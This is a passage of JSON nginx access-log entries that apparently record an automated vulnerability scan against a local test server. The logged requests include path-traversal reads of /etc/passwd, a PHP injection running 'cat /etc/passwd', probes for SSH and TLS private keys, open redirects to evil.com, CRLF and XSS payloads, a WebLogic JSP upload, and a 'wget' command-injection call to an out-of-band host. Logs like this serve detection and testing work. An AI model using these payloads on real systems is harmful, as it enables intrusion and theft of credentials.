+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /my.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secure/ViewUserHover.jspa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /errors.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json;%0aa.html?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.ssh/authorized_keys HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/system.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\x5C0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /typo3/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /sysmgmt/2015/bmc/session HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/71 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /runningpods/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /app.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmodule-ee/login.seam HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /key.pem HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /t/index.php?action[]=aaaa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /client/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/logs/error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json;%0aa.js?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_/.ssh/authorized_keys HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/vpn.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?pp=env HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=Windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?redirect=/\x5C/evil.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cf_scripts/scripts/ajax/package/cfajax.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/72 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20example.com%0d%0aX-XSS-Protection:0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /application.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphql/console HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"setting_id=general&BasicConfigOptions.workDir=%2Fu01%2Foracle%2Fuser_projects%2Fdomains%2Fbase_domain%2Fservers%2FAdminServer%2Ftmp%2F_WL_internal%2Fcom.oracle.webservices.wls.ws-testclient-app-wls%2F4mcj4y%2Fwar%2Fcss&BasicConfigOptions.proxyHost=&BasicConfigOptions.proxyPort=80","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ws_utc/resources/setting/options HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ssl/localhost.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/Home/uploadify/fileList?type=.+&path=../../../ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /var HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/logs/errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json;%0aa.png?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"username=%3Cimg%2Fsrc%2Fonerror%3Dalert%28document.domain%29%3E&password=test","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cas/v1/tickets/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/access.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"submitId=debug&debugCmd=wget+http://ca28fg0smpvbd3qg07h0914knmd4cfdjp.oast.live&submitEnd=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login.htm HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?redirect=//evil.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cf-scripts/scripts/ajax/package/cfajax.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/73 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /menu/guiw?nsbrand=1&protocol=nonexistent.1337\x22>&id=3&nsvpx=phpinfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /application.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphql/schema.json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"------WebKitFormBoundaryuim0dyiDSPBPu31g\x0D\x0AContent-Disposition: form-data; name=\x22ks_name\x22\x0D\x0A\x0D\x0A29KD1sYOKq5UmIfth8cUBNaXheL\x0D\x0A------WebKitFormBoundaryuim0dyiDSPBPu31g\x0D\x0AContent-Disposition: form-data; name=\x22ks_edit_mode\x22\x0D\x0A\x0D\x0Afalse\x0D\x0A------WebKitFormBoundaryuim0dyiDSPBPu31g\x0D\x0AContent-Disposition: form-data; name=\x22ks_password_front\x22\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundaryuim0dyiDSPBPu31g\x0D\x0AContent-Disposition: form-data; name=\x22ks_password\x22\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundaryuim0dyiDSPBPu31g\x0D\x0AContent-Disposition: form-data; name=\x22ks_password_changed\x22\x0D\x0A\x0D\x0Afalse\x0D\x0A------WebKitFormBoundaryuim0dyiDSPBPu31g\x0D\x0AContent-Disposition: form-data; name=\x22ks_filename\x22; filename=\x2229KD1sYOKq5UmIfth8cUBNaXheL.jsp\x22\x0D\x0AContent-Type: application/octet-stream\x0D\x0A\x0D\x0A<%@ page import=\x22java.util.*,java.io.*\x22%>\x0D\x0A<%@ page import=\x22java.security.MessageDigest\x22%>\x0D\x0A\x0D\x0A<%\x0D\x0AString cve = \x22CVE-2018-2894\x22;\x0D\x0AMessageDigest alg = MessageDigest.getInstance(\x22MD5\x22);\x0D\x0Aalg.reset();\x0D\x0Aalg.update(cve.getBytes());\x0D\x0Abyte[] digest = alg.digest();\x0D\x0AStringBuffer hashedpasswd = new StringBuffer();\x0D\x0AString hx;\x0D\x0Afor (int i=0;i\x0D\x0A------WebKitFormBoundaryuim0dyiDSPBPu31g--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ws_utc/resources/setting/keystore HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": 